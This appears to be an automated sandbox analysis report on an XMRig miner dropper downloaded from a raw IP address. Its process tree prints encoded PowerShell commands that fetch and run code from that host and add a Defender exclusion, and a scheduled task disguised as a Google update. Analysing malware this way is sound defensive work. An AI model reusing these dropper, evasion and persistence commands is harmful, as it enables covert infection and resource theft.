xmrig | hxxp://62[.]204[.]41[.]194/file[.]exe

Resubmissions

05-01-2023 23:51

230105-3wbz8adf75 10

05-01-2023 23:48

230105-3tlrmshc4z 8

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
05-01-2023 23:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://62.204.41.194/file.exe

Score

10^/10

xmrig miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3008-170-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-172-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-174-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-175-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-176-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-178-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-180-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-181-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-182-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-184-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-185-0x000000014036EAC4-mapping.dmp	xmrig
behavioral1/memory/3008-187-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-188-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3008-191-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

7 852 powershell.exe
8 1908 powershell.exe
9 720 powershell.exe
10 1612 powershell.exe
11 1496 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

file.exefile.exeNoSleep.exeOneDrive.exe

pid process

288 file.exe
1000 file.exe
2448 NoSleep.exe
2840 OneDrive.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exetaskeng.exe

pid process

1908 powershell.exe
2804 taskeng.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2860 set thread context of 3008 2860 conhost.exe conhost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2696 schtasks.exe

flow	pid	process
7	852	powershell.exe
8	1908	powershell.exe
9	720	powershell.exe
10	1612	powershell.exe
11	1496	powershell.exe

pid	process
288	file.exe
1000	file.exe
2448	NoSleep.exe
2840	OneDrive.exe

pid	process
1908	powershell.exe
2804	taskeng.exe

description	pid	process	target process
PID 2860 set thread context of 3008	2860	conhost.exe	conhost.exe

pid	process
2696	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 70d613096921d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8094f11b6921d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{41889091-8D5C-11ED-8538-4A4A572A2DE9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f46d5cf6b9f6194b8621084813b5d02f0000000002000000000010660000000100002000000040b7e70024c637951d798ee32e43b09c7b5c041e16556011aad9982801f8be96000000000e8000000002000020000000e173b62bf7248c89a415d45c982701f5baa2586f32d573d338d9d8f93d73a46020000000f7bf294c122a96c54638cff88eb5229349f0e8614abef662212c72f1bf3a00e44000000069d02bd512fbb799b68353d88cdc4bb64f352b2752dc2e413920260c7778ee4cb0d80eafe5b817316e112837b95adbc34ea4c44cdc8ab6af8aa402b493ae6c06	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f46d5cf6b9f6194b8621084813b5d02f00000000020000000000106600000001000020000000a1f0c7054a514d324b70cc723f410120b1fca8375ef98305efea45819e30b949000000000e80000000020000200000006761611520a8f197123cdbec659aee8f06b2333e3001194df32edf9845e21e3c90000000d38368f3691f14bf9fd3359b5e3387fa14cc4ec390fb2c4cd30454dfe0acaa1112f7ee60e2789f16361076877a33fca62455aef57568a171258be9c7a1aae85421fe5cbfab0ce5fd8a6733e8ad07b0886cc590a8f76e3a2d81fecc891195d70ca2fa77ad6f3f2a03930830c17c1f40b449b4ca32f31b63bf849528914d8395241e4b72557c43ad8d5fad1a93183d5ee2400000002de1774c7415bb1ad4a217cb97f2bd8fb3e83dac076717dd939ab0364aa51f9747b66965110c2fc3be011c43591cda18d5c6d77ec434f2473d4fd16bff3b5188	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "379731272"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.execonhost.exe

pid	process
1612	powershell.exe
1296	powershell.exe
720	powershell.exe
852	powershell.exe
1908	powershell.exe
440	powershell.exe
1828	powershell.exe
1496	powershell.exe
1908	powershell.exe
1908	powershell.exe
2472	conhost.exe
2860	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe
3008	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	720	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	440	powershell.exe
Token: SeDebugPrivilege	2472	conhost.exe
Token: SeDebugPrivilege	2860	conhost.exe
Token: SeLockMemoryPrivilege	3008	conhost.exe
Token: SeLockMemoryPrivilege	3008	conhost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

1388 iexplore.exe
1388 iexplore.exe
1388 iexplore.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1388 iexplore.exe
1388 iexplore.exe
2024 IEXPLORE.EXE
2024 IEXPLORE.EXE

pid	process
1388	iexplore.exe
1388	iexplore.exe
1388	iexplore.exe

pid	process
1388	iexplore.exe
1388	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exefile.exefile.exepowershell.exeNoSleep.execonhost.execmd.execmd.exetaskeng.exeOneDrive.execonhost.exe

description	pid	process	target process
PID 1388 wrote to memory of 2024	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 2024	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 2024	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 2024	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 288	1388	iexplore.exe	file.exe
PID 1388 wrote to memory of 288	1388	iexplore.exe	file.exe
PID 1388 wrote to memory of 288	1388	iexplore.exe	file.exe
PID 288 wrote to memory of 720	288	file.exe	powershell.exe
PID 288 wrote to memory of 720	288	file.exe	powershell.exe
PID 288 wrote to memory of 720	288	file.exe	powershell.exe
PID 288 wrote to memory of 1296	288	file.exe	powershell.exe
PID 288 wrote to memory of 1296	288	file.exe	powershell.exe
PID 288 wrote to memory of 1296	288	file.exe	powershell.exe
PID 288 wrote to memory of 1496	288	file.exe	powershell.exe
PID 288 wrote to memory of 1496	288	file.exe	powershell.exe
PID 288 wrote to memory of 1496	288	file.exe	powershell.exe
PID 288 wrote to memory of 1828	288	file.exe	powershell.exe
PID 288 wrote to memory of 1828	288	file.exe	powershell.exe
PID 288 wrote to memory of 1828	288	file.exe	powershell.exe
PID 1388 wrote to memory of 1000	1388	iexplore.exe	file.exe
PID 1388 wrote to memory of 1000	1388	iexplore.exe	file.exe
PID 1388 wrote to memory of 1000	1388	iexplore.exe	file.exe
PID 1000 wrote to memory of 1612	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 1612	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 1612	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 1908	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 1908	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 1908	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 852	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 852	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 852	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 440	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 440	1000	file.exe	powershell.exe
PID 1000 wrote to memory of 440	1000	file.exe	powershell.exe
PID 1908 wrote to memory of 2448	1908	powershell.exe	NoSleep.exe
PID 1908 wrote to memory of 2448	1908	powershell.exe	NoSleep.exe
PID 1908 wrote to memory of 2448	1908	powershell.exe	NoSleep.exe
PID 2448 wrote to memory of 2472	2448	NoSleep.exe	conhost.exe
PID 2448 wrote to memory of 2472	2448	NoSleep.exe	conhost.exe
PID 2448 wrote to memory of 2472	2448	NoSleep.exe	conhost.exe
PID 2448 wrote to memory of 2472	2448	NoSleep.exe	conhost.exe
PID 2472 wrote to memory of 2664	2472	conhost.exe	cmd.exe
PID 2472 wrote to memory of 2664	2472	conhost.exe	cmd.exe
PID 2472 wrote to memory of 2664	2472	conhost.exe	cmd.exe
PID 2664 wrote to memory of 2696	2664	cmd.exe	schtasks.exe
PID 2664 wrote to memory of 2696	2664	cmd.exe	schtasks.exe
PID 2664 wrote to memory of 2696	2664	cmd.exe	schtasks.exe
PID 2472 wrote to memory of 2752	2472	conhost.exe	cmd.exe
PID 2472 wrote to memory of 2752	2472	conhost.exe	cmd.exe
PID 2472 wrote to memory of 2752	2472	conhost.exe	cmd.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	schtasks.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	schtasks.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	schtasks.exe
PID 2804 wrote to memory of 2840	2804	taskeng.exe	OneDrive.exe
PID 2804 wrote to memory of 2840	2804	taskeng.exe	OneDrive.exe
PID 2804 wrote to memory of 2840	2804	taskeng.exe	OneDrive.exe
PID 2840 wrote to memory of 2860	2840	OneDrive.exe	conhost.exe
PID 2840 wrote to memory of 2860	2840	OneDrive.exe	conhost.exe
PID 2840 wrote to memory of 2860	2840	OneDrive.exe	conhost.exe
PID 2840 wrote to memory of 2860	2840	OneDrive.exe	conhost.exe
PID 2860 wrote to memory of 2924	2860	conhost.exe	conhost.exe
PID 2860 wrote to memory of 2924	2860	conhost.exe	conhost.exe
PID 2860 wrote to memory of 2924	2860	conhost.exe	conhost.exe
PID 2860 wrote to memory of 2924	2860	conhost.exe	conhost.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://62.204.41.194/file.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1388

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2024

C:\Users\Admin\Downloads\file.exe
"C:\Users\Admin\Downloads\file.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Users\Admin\Downloads\file.exe
"C:\Users\Admin\Downloads\file.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
6⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
7⤵
- Creates scheduled task(s)
PID:2696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
7⤵
PID:2788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1620

C:\Windows\system32\taskeng.exe
taskeng.exe {24B25B76-E59B-4BB3-809F-88D1AF5C5FA4} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2804

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "cvxjxkjice"
4⤵
PID:2924

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008

Network

